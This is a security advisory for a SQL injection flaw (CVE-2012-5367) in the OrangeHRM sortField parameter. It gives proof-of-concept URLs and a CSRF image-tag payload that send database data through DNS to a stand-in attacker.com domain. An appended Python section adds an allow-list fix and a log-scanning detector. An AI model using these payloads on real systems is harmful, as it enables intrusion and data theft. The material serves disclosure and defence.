High-Tech Bridge HTB23119
SQL Injection Vulnerability in OrangeHRM

2012-10-10 00:00:00
High-Tech Bridge
www.htbridge.com

CVSS2: 6 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

EPSS: 0.001 Low (Percentile 38.9%)

High-Tech Bridge Security Research Lab discovered a SQL injection vulnerability in OrangeHRM, which could be exploited to alter SQL requests to the application's database.

  1. SQL Injection Vulnerability in Orange HRM: CVE-2012-5367
    The vulnerability was discovered in the "/symfony/web/index.php" script while handling the "sortField" HTTP GET parameter.
    Successful exploitation of this vulnerability requires administrative privileges; however, it can be exploited by a non-authenticated user via a CSRF vector, as the above-mentioned script is also vulnerable to CSRF attack.
    The vulnerability could be triggered by accessing the following URIs:
    /symfony/web/index.php/admin/viewCustomers
    /symfony/web/index.php/admin/viewPayGrades
    The PoC code below is based on the DNS exfiltration technique and can be used when the application's database is hosted on a Windows system. The PoCs will send a DNS request asking for the IP address of the version() (or any other sensitive information from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

The following PoC demonstrates exploitation of the vulnerability via CSRF vector:
<img src="http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">

1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
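As an added example that is not part of the advisory or of OrangeHRM's code, the Python below shows the defensive pattern that removes this bug class (an exact allow-list for sortField and sortOrder before they are placed in an ORDER BY clause) together with a detector that scans access-log lines for admin requests whose sortField is not a plain column identifier. The column names and log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list of sortable columns per admin view. The column names are
# constructed for this example; the advisory does not list the real ones.
ALLOWED_SORT_FIELDS = {
    "viewCustomers": {"name", "description"},
    "viewPayGrades": {"name"},
    "viewSystemUsers": {"userName", "userRole", "status"},
}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}

def safe_order_by(view, sort_field, sort_order="ASC"):
    """Build ORDER BY from request parameters by exact allow-list lookup, so a
    value such as "(select load_file(...))" can never reach the SQL text."""
    if sort_field not in ALLOWED_SORT_FIELDS.get(view, ()):
        raise ValueError(f"sortField not permitted for {view}: {sort_field!r}")
    if sort_order not in ALLOWED_SORT_ORDERS:
        raise ValueError(f"sortOrder not permitted: {sort_order!r}")
    return f"ORDER BY {sort_field} {sort_order}"

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*$")

def flag_sort_injection(log_text):
    """Return (ip, view, sortField) for each /admin/ request whose sortField is
    not a plain column identifier, e.g. the load_file()/CHAR() payload above."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if "/admin/" not in parts.path:
            continue
        view = parts.path.rsplit("/", 1)[-1]
        for value in parse_qs(parts.query).get("sortField", []):
            if not IDENT_RE.match(value):   # parse_qs already URL-decodes
                hits.append((m.group("ip"), view, value))
    return hits

# Constructed sample log lines (not from the advisory): one benign request and
# one carrying a URL-encoded, shortened form of the advisory's sortField payload.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2012:10:01:02 +0000] "GET /symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=name HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2012:10:01:07 +0000] "GET /symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97)))) HTTP/1.1" 200 5120
"""
```

Running `flag_sort_injection(SAMPLE_LOG)` reports only the second request, and `safe_order_by` raises on anything that is not an allow-listed column.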

CPE Name  | Operator | Version
orangehrm | le       | 2.7.1-rc.1
